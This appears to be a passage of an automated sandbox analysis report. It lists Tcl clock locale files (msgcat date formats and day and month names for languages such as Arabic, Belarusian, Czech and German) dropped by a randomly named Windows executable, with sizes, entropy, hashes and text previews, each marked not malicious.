                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset af_ZA DATE_FORMAT "%d %B %Y".. ::msgcat::mcset af_ZA TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset af_ZA DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2018
                                                                                                                                                                                                                              Entropy (8bit):4.477377447232708
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83gr/fsS/Sm8p4M/n1KsPktE30AiJcAxi9CEzdEvSCHvMSV:43UkiSm8p3nX0EzdCSCPV
                                                                                                                                                                                                                              MD5:D264D01B46D96455715114CAEDF9F05E
                                                                                                                                                                                                                              SHA1:A3F68A4C6E69433BD53E52B73041575F3B3AC3F2
                                                                                                                                                                                                                              SHA-256:B69D0061A728D59F89FF8621312789CD9F540BF2E2ED297804D22F6278561D85
                                                                                                                                                                                                                              SHA-512:A4163DAA6821B293EADD5D499E0641A8B7C93180C710D6B364AE8681A8FF6F35EC948C8DDBE960A8466AF1ACABC15B0D465A08B084617E8005D708459F7E74D3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar DAYS_OF_WEEK_ABBREV [list \.. "\u062d"\.. "\u0646"\.. "\u062b"\.. "\u0631"\.. "\u062e"\.. "\u062c"\.. "\u0633"].. ::msgcat::mcset ar DAYS_OF_WEEK_FULL [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar MONTHS_ABBREV [list \.. "\u064a\u0646\u0627"\.. "\u0641\u0628\u0631"\.. "\u0645\u0627\u0631"\.. "\u0623\u0628\u0631"\.. "\u0645\u0627\u064a"\.. "\u064a\u0648\u0646"\.. "\u064a\u0648\u0644"\.. "\u0623\u063a\u0633"\.. "\u0633\u0628\u062a"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                                              Entropy (8bit):4.872222510420193
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoKNvfcoKU3v6xyFjoKNo+3vfXM68vn:4EnLB3831vfD3v6g9F3vfc6+n
                                                                                                                                                                                                                              MD5:430498B4AB1E77C86BC1311A49747581
                                                                                                                                                                                                                              SHA1:684EAD965D9010C2A6E73DCACB2224FDE585F9FF
                                                                                                                                                                                                                              SHA-256:2E04B96DA002519D28125918A22FF2BB9659A668A7BCAD34D85DDDECEC8DC0B4
                                                                                                                                                                                                                              SHA-512:9F85A88A383DCFC54DAA6253D94C307A14B1CC91D5C97AF817B8122AF98025AB2430D0B2D656EBED09E78FB854D1F9CF99F3B791A6ECB7834112012739140126
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_IN DATE_FORMAT "%A %d %B %Y".. ::msgcat::mcset ar_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ar_IN DATE_TIME_FORMAT "%A %d %B %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1851
                                                                                                                                                                                                                              Entropy (8bit):4.08645484776227
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83sxS/Sm819+es/Ii/R91bpH0+U0c+es/Ii/R91bpH0+UO:43wiSm815MbJbHgMbJbp
                                                                                                                                                                                                                              MD5:5C62D606F4F14BC8994B28F9622D70DD
                                                                                                                                                                                                                              SHA1:E99F8CC5D330085545B05B69213E9D011D436990
                                                                                                                                                                                                                              SHA-256:5ADBB3D37C3369E5FC80D6A462C82598D5A22FAEF0E8DF6B3148231D2C6A7F73
                                                                                                                                                                                                                              SHA-512:81AC9200459B0896E27A028BD089A174F7F921B0367BC8FF1AB33D3E561417B6F8EC23DAB750ECB408AC8A11CDFDBFA4F890F9E723BB8607B017C9FEE00928A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_JO DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_JO MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1851
                                                                                                                                                                                                                              Entropy (8bit):4.083347689510237
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83LxS/Sm8S9+es/Ii/R91bpH0+U/c+es/Ii/R91bpH0+UO:431iSm8S5MbJbQgMbJbp
                                                                                                                                                                                                                              MD5:6FC1CC738207E2F8E0871103841BC0D4
                                                                                                                                                                                                                              SHA1:D2C62C7F6DA1EF399FCBE2BA91C9562C87E6152F
                                                                                                                                                                                                                              SHA-256:1FC13070CF661488E90FECE84274C46B1F4CC7E1565EAB8F829CCAA65108DFCA
                                                                                                                                                                                                                              SHA-512:E547D5CBB746654051AFDA21942075BC2224C2FF75D440C6C34C642AD24CF622E520FF919B8BD4AFC0116D9CE69B3ABA4E81EE247C1388F3C5741150201F5C60
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_LB DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_LB MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1851
                                                                                                                                                                                                                              Entropy (8bit):4.084701680556524
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83lxS/Sm8M9+es/Ii/R91bpH0+UBc+es/Iv/I91bpH0+UO:43LiSm8M5MbJbSgMo0bp
                                                                                                                                                                                                                              MD5:8188C37CA44FEFFF8D895AAD503AD4F6
                                                                                                                                                                                                                              SHA1:C48F2E3B9FC055704D2DAFDC67E9D08EE6897D45
                                                                                                                                                                                                                              SHA-256:294F3E46C55453EDAD44567E1330F9B43E69A07FA0655B24DD2780A4490C1194
                                                                                                                                                                                                                              SHA-512:F86FCFC7C460473D46C472041AB2E1F9388CF34BCA9050295D1DAE454E35A2A0320D0C61D5E8CBB832AF74FFDD1A7511AF32EA2A53B481F39A1CBCF5F086D514
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_SY DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_SY MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2157
                                                                                                                                                                                                                              Entropy (8bit):4.27810535662921
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43PI8IKQGQ8mA/XxQJxQnA9QJlPyI/tbCaQICMIcQ8InVI5tNIzQFIQQLtChjsI4:2PItK5BSb9ajfycCW5IzdQNxK
                                                                                                                                                                                                                              MD5:6334BDDFC1E0EAE4DBB2C90F85818FD8
                                                                                                                                                                                                                              SHA1:085EDC3D027D6B5A6A6A2561717EA89C8F8B8B39
                                                                                                                                                                                                                              SHA-256:A636A82C7D00CCDC0AF2496043FFA320F17B0D48A1232708810D3BB1453E881E
                                                                                                                                                                                                                              SHA-512:18ADB77314FCFD534E55B234B3A53A0BC572AB60B80D099D2F3B20E0C5FE66179FDC076AA43200DB3CA123BC6216989EC41448FA624D3BA9633413AD8AD6034C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset be DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0430\u0442"\.. "\u0441\u0440"\.. "\u0447\u0446"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset be DAYS_OF_WEEK_FULL [list \.. "\u043d\u044f\u0434\u0437\u0435\u043b\u044f"\.. "\u043f\u0430\u043d\u044f\u0434\u0437\u0435\u043b\u0430\u043a"\.. "\u0430\u045e\u0442\u043e\u0440\u0430\u043a"\.. "\u0441\u0435\u0440\u0430\u0434\u0430"\.. "\u0447\u0430\u0446\u0432\u0435\u0440"\.. "\u043f\u044f\u0442\u043d\u0456\u0446\u0430"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset be MONTHS_ABBREV [list \.. "\u0441\u0442\u0434"\.. "\u043b\u044e\u0442"\.. "\u0441\u043a\u0432"\.. "\u043a\u0440\u0441"\.. "\u043c\u0430\u0439"\.. "\u0447\u0440\u0432"\.. "\u043b\u043f\u043d"
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1871
                                                                                                                                                                                                                              Entropy (8bit):4.4251657008559935
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43EUAIlnQf/QVdQ81mnEZqEavWQEQ3QvQrQL0QjQTtQDCQSY4tqP:27xMk+nEZqE3biIYbUi+C9y
                                                                                                                                                                                                                              MD5:E5225D6478C60E2502D18698BB917677
                                                                                                                                                                                                                              SHA1:52D611CB5351FB873D2535246B3A3C1A37094023
                                                                                                                                                                                                                              SHA-256:CFE4E44A3A751F113847667EC9EA741E762BBDE0D4284822CB337DF0F92C1ACA
                                                                                                                                                                                                                              SHA-512:59AB167177101088057BF4EE0F70262987A2177ECB72C613CCAAE2F3E8D8B77F07D15DA5BE3B8728E23C31A1C9736030AA4036A8CD00A24791751A298B3A88B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bg DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0434"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset bg DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u043b\u044f"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0412\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0421\u0440\u044f\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u044a\u0440\u0442\u044a\u043a"\.. "\u041f\u0435\u0442\u044a\u043a"\.. "\u0421\u044a\u0431\u043e\u0442\u0430"].. ::msgcat::mcset bg MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset bg MO
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2335
                                                                                                                                                                                                                              Entropy (8bit):4.107102006297273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR835e/MWrD//6HFEVcVVcCVcTUTVckVEVcT7VcEEVcby/Vcn0VcMr/0VcM8VcQ:43ktX++QalMObalMZ6IE6V
                                                                                                                                                                                                                              MD5:5D25E7FC65824AC987535FEA14A4045C
                                                                                                                                                                                                                              SHA1:85C10F05823CD3263FC7B3EC38796BEC261B3716
                                                                                                                                                                                                                              SHA-256:890EA6521DEB1B3C3913CCD92562F6360E064DAEE2E2B0356A6DD97A46264A1F
                                                                                                                                                                                                                              SHA-512:5D8A88ACAEBBF3CD721F288FA0F1FEE517EE568CA5482E30CFA1E36CD37DF011C449090E2D9041F1D046A191F13D4C5C4B6F9E2F16FD259E63CE46ECC4E4F81F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn DAYS_OF_WEEK_ABBREV [list \.. "\u09b0\u09ac\u09bf"\.. "\u09b8\u09cb\u09ae"\.. "\u09ae\u0999\u0997\u09b2"\.. "\u09ac\u09c1\u09a7"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf"\.. "\u09b6\u09c1\u0995\u09cd\u09b0"\.. "\u09b6\u09a8\u09bf"].. ::msgcat::mcset bn DAYS_OF_WEEK_FULL [list \.. "\u09b0\u09ac\u09bf\u09ac\u09be\u09b0"\.. "\u09b8\u09cb\u09ae\u09ac\u09be\u09b0"\.. "\u09ae\u0999\u0997\u09b2\u09ac\u09be\u09b0"\.. "\u09ac\u09c1\u09a7\u09ac\u09be\u09b0"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf\u09ac\u09be\u09b0"\.. "\u09b6\u09c1\u0995\u09cd\u09b0\u09ac\u09be\u09b0"\.. "\u09b6\u09a8\u09bf\u09ac\u09be\u09b0"].. ::msgcat::mcset bn MONTHS_ABBREV [list \.. "\u099c\u09be\u09a8\u09c1\u09df\u09be\u09b0\u09c0"\.. "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1\u09df\u09be
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                                              Entropy (8bit):4.868201122972066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xovtvfluo/E3v6xyFjovto+3vflm68vn:4EnLB383UtvfltE3v6g8tF3vflm6+n
                                                                                                                                                                                                                              MD5:B91BB2ABC23B90962D2070B9588F2AB5
                                                                                                                                                                                                                              SHA1:CBB4E9CD600773792C6E9F3E6B27E99C1846B44F
                                                                                                                                                                                                                              SHA-256:B3D8A4632290B0F3DA690E47C1FDF06A8B9E171A96E938AFDB0DD52CF806CE54
                                                                                                                                                                                                                              SHA-512:932FC4B8C3CA72731187D56012AD7DD7777C4D447F16EEB17B9D68235C9590DF99992FD22B8D7C85A843A610F93CD36FAFA993C34C441255A1C0A93C73BC5FE4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn_IN DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset bn_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset bn_IN DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1152
                                                                                                                                                                                                                              Entropy (8bit):4.2880653012847985
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83FMVBNfPg+g+RjMu5+C6MB4zdiwvWvn:432g6jh65zd3gn
                                                                                                                                                                                                                              MD5:72DDD60C907DD235BCE4AB0A5AEE902C
                                                                                                                                                                                                                              SHA1:06150F793251687E6FBC3FDA3BC81BCBFC7DE763
                                                                                                                                                                                                                              SHA-256:3BE295DCC8FCDC767FED0C68E3867359C18E7E57D7DB6C07236B5BC572AD328E
                                                                                                                                                                                                                              SHA-512:3B0A85003692F1E46185D5CC09236D2DA5E6D29166C9812D07A7D6BF6AC6C3B0708F91C6899768D4DBA3528081B8B43E09F49622B70F1CF991AFAC5352B6BA37
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ca DAYS_OF_WEEK_ABBREV [list \.. "dg."\.. "dl."\.. "dt."\.. "dc."\.. "dj."\.. "dv."\.. "ds."].. ::msgcat::mcset ca DAYS_OF_WEEK_FULL [list \.. "diumenge"\.. "dilluns"\.. "dimarts"\.. "dimecres"\.. "dijous"\.. "divendres"\.. "dissabte"].. ::msgcat::mcset ca MONTHS_ABBREV [list \.. "gen."\.. "feb."\.. "mar\u00e7"\.. "abr."\.. "maig"\.. "juny"\.. "jul."\.. "ag."\.. "set."\.. "oct."\.. "nov."\.. "des."\.. ""].. ::msgcat::mcset ca MONTHS_FULL [list \.. "gener"\.. "febrer"\.. "mar\u00e7"\.. "abril"\.. "maig"\.. "juny"\.. "juliol"\.. "agost"\.. "setembre"\.. "octubre"\.. "novembre"\.. "desembre"\.. ""].. ::msg
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1354
                                                                                                                                                                                                                              Entropy (8bit):4.466447248030554
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83U4nZ4yJTkkG3mYWEZqO1R3DNBEVG+PYhxrU4UF3ecCvt7/v3e6:43TJTGmnEZqE5/EVEDOGtDp
                                                                                                                                                                                                                              MD5:F32EAD82CC26754C5A8E092873A28DB3
                                                                                                                                                                                                                              SHA1:325124660F62242B24623B4B737CB4616F86CFF3
                                                                                                                                                                                                                              SHA-256:AFEA12A16A6FA750EA610245133B90F178BA714848F89AEC37429A3E7B06BE1A
                                                                                                                                                                                                                              SHA-512:04E335AAFBF4D169983635FC87BCFFE86FBA570A3E1820D20240EF7B47E7A3CD94AE3598543DCE92A1F82B5146CAAD982EFE9490EFD9E581D58515CFC3930581
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset cs DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "\u00dat"\.. "St"\.. "\u010ct"\.. "P\u00e1"\.. "So"].. ::msgcat::mcset cs DAYS_OF_WEEK_FULL [list \.. "Ned\u011ble"\.. "Pond\u011bl\u00ed"\.. "\u00dater\u00fd"\.. "St\u0159eda"\.. "\u010ctvrtek"\.. "P\u00e1tek"\.. "Sobota"].. ::msgcat::mcset cs MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset cs MONTHS_FULL [list \.. "leden"\.. "\u00fanor"\.. "b\u0159ezen"\.. "duben"\.. "kv\u011bten"\.. "\u010derven"\.. "\u010dervenec"\.. "srpen"\.. "z\u00e1\u0159\u00ed"\.. "\u0159\u00edjen"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1208
                                                                                                                                                                                                                              Entropy (8bit):4.315504392809956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83wV0tBVYuorIsmZ5meAxyISjTHU92WFVwpwvbvT:43w+DiuorreAY0zw8rT
                                                                                                                                                                                                                              MD5:27A6A8BE8903AEF9D0BE956906A89583
                                                                                                                                                                                                                              SHA1:EE29FDF67CB3AE150DF6BBBE603C1C3F5DA28641
                                                                                                                                                                                                                              SHA-256:0D422A991BCA13FE9033118691CFEDAB0F372222EBB0BC92BAF8E914EE816B84
                                                                                                                                                                                                                              SHA-512:0E702A679AD94BF479226B7DE32077562F3F95210F6453AE564138386DBB179941BA5359AEE9AC532F4A6E5BE745D6962D6B638A21DD48B865716F2FD2A0CB01
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset da DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset da DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset da MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset da MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marts"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset da B
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1276
                                                                                                                                                                                                                              Entropy (8bit):4.349293509679722
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83cFNSsZKKgXum47fpK2OaSIui7dHqWZ0ZIBFJWJvvvWIn:43InZKKgXoOqx1W67W9XWIn
                                                                                                                                                                                                                              MD5:EE3963A5F7E29C05C9617BE3FD897114
                                                                                                                                                                                                                              SHA1:0F978CA174DF596817F872B5EF1B447B9DFE651C
                                                                                                                                                                                                                              SHA-256:4C27733502066E8391654D1D372F92BF0484C5A3821E121AE8AA5B99378C99AE
                                                                                                                                                                                                                              SHA-512:EA933709C68F8199858A1CC1FFDA67EE7458CC57A163E672535EB0B4C37BFDC200604C7506748DAC3158B6CA63C2F076A2C6252B2A596E59F83D3B1D4BC9C901
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Mo"\.. "Di"\.. "Mi"\.. "Do"\.. "Fr"\.. "Sa"].. ::msgcat::mcset de DAYS_OF_WEEK_FULL [list \.. "Sonntag"\.. "Montag"\.. "Dienstag"\.. "Mittwoch"\.. "Donnerstag"\.. "Freitag"\.. "Samstag"].. ::msgcat::mcset de MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mrz"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::msgcat::mcset de BCE "v.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):847
                                                                                                                                                                                                                              Entropy (8bit):4.412930056658995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR831sMm47fpK2++SIui7dHqWZ0ZItovGvzvW:431h+mx1Wm+QjW
                                                                                                                                                                                                                              MD5:A6227CD4F7434952D093F1F3C64B4378
                                                                                                                                                                                                                              SHA1:0DDB9A49CB83DDF2396B2ECA85093260710496C2
                                                                                                                                                                                                                              SHA-256:1C02D14140196623297F858E2EEF00B4159E1C6FAFE044EC65A48C9C24D46540
